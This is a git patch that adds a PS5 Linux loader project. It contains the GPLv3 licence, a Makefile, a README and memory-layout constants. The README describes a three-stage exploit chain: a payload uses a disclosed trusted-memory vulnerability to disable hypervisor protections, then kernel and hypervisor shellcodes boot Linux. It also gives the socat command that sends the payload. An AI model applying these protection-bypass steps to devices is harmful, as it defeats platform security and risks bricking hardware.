From 4fc5de4d36baa032c5167988b1c30597ad14caab Mon Sep 17 00:00:00 2001 From: Mateico <116546494+mateicoes@users.noreply.github.com> Date: Fri, 24 Apr 2026 17:30:06 +0200 Subject: [PATCH] initial commit support 3.xx and 4.xx --- LICENSE | 674 ++++++++++++++++++ Makefile | 45 ++ README.md | 83 +++ include/config.h | 34 + include/gpu.h | 70 ++ include/hv_defeat.h | 19 + include/iommu.h | 46 ++ include/loader.h | 11 + include/main.h | 8 + include/offsets.h | 51 ++ include/tmr.h | 19 + include/utils.h | 162 +++++ shellcode_hypervisor/Makefile | 32 + shellcode_hypervisor/bin_to_c_hypervisor.py | 46 ++ shellcode_hypervisor/boot_linux.c | 173 +++++ shellcode_hypervisor/boot_linux.h | 43 ++ shellcode_hypervisor/linker.ld | 18 + shellcode_hypervisor/linux.h | 114 +++ shellcode_hypervisor/main.c | 37 + shellcode_hypervisor/main.h | 3 + .../shellcode_hypervisor_args.h | 9 + shellcode_hypervisor/utils.c | 114 +++ shellcode_hypervisor/utils.h | 28 + shellcode_kernel/Makefile | 33 + shellcode_kernel/bin_to_c_kernel.py | 48 ++ shellcode_kernel/kernel_code.c | 184 +++++ shellcode_kernel/kernel_code.h | 24 + shellcode_kernel/linker.ld | 18 + shellcode_kernel/main.c | 296 ++++++++ shellcode_kernel/main.h | 71 ++ shellcode_kernel/shellcode_kernel_args.h | 37 + shellcode_kernel/utils.c | 77 ++ shellcode_kernel/utils.h | 43 ++ source/gpu.c | 495 +++++++++++++ source/hv_defeat.c | 295 ++++++++ source/iommu.c | 103 +++ source/loader.c | 242 +++++++ source/main.c | 175 +++++ source/offsets.c | 298 ++++++++ source/tmr.c | 12 + source/utils.c | 219 ++++++ 41 files changed, 4509 insertions(+) create mode 100644 LICENSE create mode 100644 Makefile create mode 100644 README.md create mode 100644 include/config.h create mode 100644 include/gpu.h create mode 100644 include/hv_defeat.h create mode 100644 include/iommu.h create mode 100644 include/loader.h create mode 100644 include/main.h create mode 100644 include/offsets.h create mode 100644 include/tmr.h create mode 100644 include/utils.h create mode 100644 shellcode_hypervisor/Makefile create mode 100644 shellcode_hypervisor/bin_to_c_hypervisor.py create mode 100644 shellcode_hypervisor/boot_linux.c create mode 100644 shellcode_hypervisor/boot_linux.h create mode 100644 shellcode_hypervisor/linker.ld create mode 100644 shellcode_hypervisor/linux.h create mode 100644 shellcode_hypervisor/main.c create mode 100644 shellcode_hypervisor/main.h create mode 100644 shellcode_hypervisor/shellcode_hypervisor_args.h create mode 100644 shellcode_hypervisor/utils.c create mode 100644 shellcode_hypervisor/utils.h create mode 100644 shellcode_kernel/Makefile create mode 100644 shellcode_kernel/bin_to_c_kernel.py create mode 100644 shellcode_kernel/kernel_code.c create mode 100644 shellcode_kernel/kernel_code.h create mode 100644 shellcode_kernel/linker.ld create mode 100644 shellcode_kernel/main.c create mode 100644 shellcode_kernel/main.h create mode 100644 shellcode_kernel/shellcode_kernel_args.h create mode 100644 shellcode_kernel/utils.c create mode 100644 shellcode_kernel/utils.h create mode 100644 source/gpu.c create mode 100644 source/hv_defeat.c create mode 100644 source/iommu.c create mode 100644 source/loader.c create mode 100644 source/main.c create mode 100644 source/offsets.c create mode 100644 source/tmr.c create mode 100644 source/utils.c diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..f288702 --- /dev/null +++ b/LICENSE @@ -0,0 +1,674 @@ + GNU GENERAL PUBLIC LICENSE + Version 3, 29 June 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU General Public License is a free, copyleft license for +software and other kinds of works. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +the GNU General Public License is intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. We, the Free Software Foundation, use the +GNU General Public License for most of our software; it applies also to +any other work released this way by its authors. You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + To protect your rights, we need to prevent others from denying you +these rights or asking you to surrender the rights. Therefore, you have +certain responsibilities if you distribute copies of the software, or if +you modify it: responsibilities to respect the freedom of others. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must pass on to the recipients the same +freedoms that you received. You must make sure that they, too, receive +or can get the source code. And you must show them these terms so they +know their rights. + + Developers that use the GNU GPL protect your rights with two steps: +(1) assert copyright on the software, and (2) offer you this License +giving you legal permission to copy, distribute and/or modify it. + + For the developers' and authors' protection, the GPL clearly explains +that there is no warranty for this free software. For both users' and +authors' sake, the GPL requires that modified versions be marked as +changed, so that their problems will not be attributed erroneously to +authors of previous versions. + + Some devices are designed to deny users access to install or run +modified versions of the software inside them, although the manufacturer +can do so. This is fundamentally incompatible with the aim of +protecting users' freedom to change the software. The systematic +pattern of such abuse occurs in the area of products for individuals to +use, which is precisely where it is most unacceptable. Therefore, we +have designed this version of the GPL to prohibit the practice for those +products. If such problems arise substantially in other domains, we +stand ready to extend this provision to those domains in future versions +of the GPL, as needed to protect the freedom of users. + + Finally, every program is threatened constantly by software patents. +States should not allow patents to restrict development and use of +software on general-purpose computers, but in those that do, we wish to +avoid the special danger that patents applied to a free program could +make it effectively proprietary. To prevent this, the GPL assures that +patents cannot be used to render the program non-free. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Use with the GNU Affero General Public License. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU Affero General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the special requirements of the GNU Affero General Public License, +section 13, concerning interaction through a network will apply to the +combination as such. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + +Also add information on how to contact you by electronic and paper mail. + + If the program does terminal interaction, make it output a short +notice like this when it starts in an interactive mode: + + Copyright (C) + This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, your program's commands +might be different; for a GUI interface, you would use an "about box". + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU GPL, see +. + + The GNU General Public License does not permit incorporating your program +into proprietary programs. If your program is a subroutine library, you +may consider it more useful to permit linking proprietary applications with +the library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. But first, please read +. diff --git a/Makefile b/Makefile new file mode 100644 index 0000000..39d8c83 --- /dev/null +++ b/Makefile @@ -0,0 +1,45 @@ +.PHONY: all clean + +ifndef PS5_PAYLOAD_SDK + PS5_PAYLOAD_SDK = /opt/ps5-payload-sdk/ +endif + +include $(PS5_PAYLOAD_SDK)/toolchain/prospero.mk + +BIN := bin/ps5-linux-loader.elf +SRC := $(wildcard source/*.c) +OBJS := $(SRC:.c=.o) + +# Agregamos los headers de los shellcodes a los CFLAGS para que los encuentre en source/main.c +CFLAGS := -std=c23 -Wall -Iinclude -Ishellcode_hypervisor -Ishellcode_kernel +LDFLAGS := + +# Rutas de los headers generados +SC_HV_H := shellcode_hypervisor/shellcode_hypervisor.h +SC_K_H := shellcode_kernel/shellcode_kernel.h + +# 1. Regla principal: Construir los shellcodes antes que los objetos del main +all: $(SC_HV_H) $(SC_K_H) $(BIN) + +# 2. Reglas para disparar el Make en las subcarpetas +# Usamos .PHONY de forma indirecta o forzamos la entrada a la carpeta +$(SC_HV_H): + $(MAKE) -C shellcode_hypervisor + +$(SC_K_H): + $(MAKE) -C shellcode_kernel + +# 3. Los objetos dependen de que los headers de los shellcodes existan +# Si main.c hace #include "shellcode_hypervisor.h", necesita estos targets +$(OBJS): %.o: %.c + $(CC) $(CFLAGS) -c -o $@ $< + +# 4. Link final +$(BIN): $(OBJS) + @mkdir -p $(dir $@) + $(CC) $(OBJS) $(LDFLAGS) -o $@ + +clean: + rm -f $(BIN) $(OBJS) + $(MAKE) -C shellcode_hypervisor clean + $(MAKE) -C shellcode_kernel clean diff --git a/README.md b/README.md new file mode 100644 index 0000000..9ec14a1 --- /dev/null +++ b/README.md @@ -0,0 +1,83 @@ +# ps5-linux-loader + +This payload let's you boot a Linux kernel on bare metal hardware on the PS5 on firmwares up to 04.51 + +Currently firmwares 1.xx and 2.xx are not supported. They will be soon. + +To do so, it uses a disclosed vulnerability that gives access to Trusted Memory Regions (TMRs). + +The process to boot Linux is divided in 3 stages: + +- Payload on Prospero OS that disables HV protections to install a shellcode in Kernel mode to be loader on system wake-up and loads Linux boot bins on memory. +- Kernel shellcode that disables HV protections and patches "VMEXIT_HANDLER" to install identity mapping and jump to HV shellcode. +- Hypervisor shellcode (real bare metal) that loads the required structure and boots the Linux kernel. + +PLEASE USE AT YOUR OWN RISK. IT MAY DAMAGE YOUR CONSOLE TURNING IT UNREPAIRABLE. + +## Credits + +[theflow](https://github.com/TheOfficialFloW): Linux kernel patches, main boot config and boot strategy + +[c0w](https://github.com/c0w-ar): Loader code and kernel/hv shellcodes + +[fail0verflow](https://github.com/fail0verflow): HV defeat vulnerability (https://github.com/fail0verflow/prosperous) + +[flatz](github.com/flatz): HV defeat vulnerability (https://gist.github.com/flatz/620ddda6d64acca6d1c990dc3080ac0e) + +[cragson](https://github.com/cragson): HV defeat implementation for <= 04.51 on PS5 HEN (https://github.com/cragson/ps5-hen) + +[john-tornblom](https://github.com/john-tornblom): PS5 SDK (https://github.com/ps5-payload-dev/sdk) + +[echostretch](https://github.com/echostretch): Offsets and testing + +## Own compilation + +First, install the [ps5-payload-sdk](https://github.com/ps5-payload-dev/sdk) + +Second, clone this repository and make + +``` +git clone git@github.com:c0w-ar/ps5-linux-loader.git + +cd ps5-linux-loader + +make +``` +## Prework + +To be able to boot linux, you first have to create a fresh install image of your desired distribution (Ubuntu recommended) on an external USB drive (SSD recommended). + +You can use any live CD / USB to install to the external drive. It's recommended that you take note of your partition UUID to use it on the boot command. + +Recommended boot command: +``` +root=UUID={your-partition-hash} rw rootwait console=ttyTitania0 console=tty0 video=DP-1:1920x1080@60 mitigations=off idle=halt pci=pcie_bus_perf +``` + +## How to Use + +Place the bzImage and initrd.img files on the folder "PS5/Linux/" on your USB drive. + +If you wish to customize the Video Ram (vram) or Boot Command you can optionally add the files "vram.txt" and "cmdline.txt". + +``` +USB0 Root +└── 📁 PS5 + └── 📁 Linux + └── 📄 bzImage + └── 📄 initrd.img + └── 📄 vram.txt (hex string) + └── 📄 cmdline.txt (custom boot command) +``` + +Send the payload + +```sh +socat -t 99999 - TCP:YOUR_PS5_IP:9021 < ps5-linux-loader.elf +``` + +Wait until you see the message that is time to put the system to sleep. + +When the orange light stop blinking and stays on, you can wake up your console and the shellcodes will be executed. + +You should get the Linux kernel booted and an available console on the UART Titania. \ No newline at end of file diff --git a/include/config.h b/include/config.h new file mode 100644 index 0000000..69fa15b --- /dev/null +++ b/include/config.h @@ -0,0 +1,34 @@ +#ifndef CONFIG_H +#define CONFIG_H + +#define PAGE_SIZE 0x4000ULL + +// This is used to allocate resources for HV shellcode and Linux boot +#define cave 0x100000000ULL +#define cave_hv_paging cave +#define cave_hv_code \ + cave_hv_paging + 0x3000ULL // Leave space for 3 pages but we only use 2 for + // 1GB 1:1 mapping +#define cave_linux_files cave_hv_code + 0x2000ULL +#define cave_linux_info cave_linux_files +#define cave_bzImage cave_linux_info + PAGE_SIZE +// #define cave_initrd // Allocated dynamically after bzImage + +#define hv_base_rsp (cave + 0x10000000ULL) +#define hv_stack_size 0x1000ULL + +// This is used as transitional storage from ProsperoOS to Kernel shellcode +#define kernel_cave_files 0xFFFF800000000000 +#define kernel_cave_linux_info kernel_cave_files +#define kernel_cave_bzImage kernel_cave_linux_info + 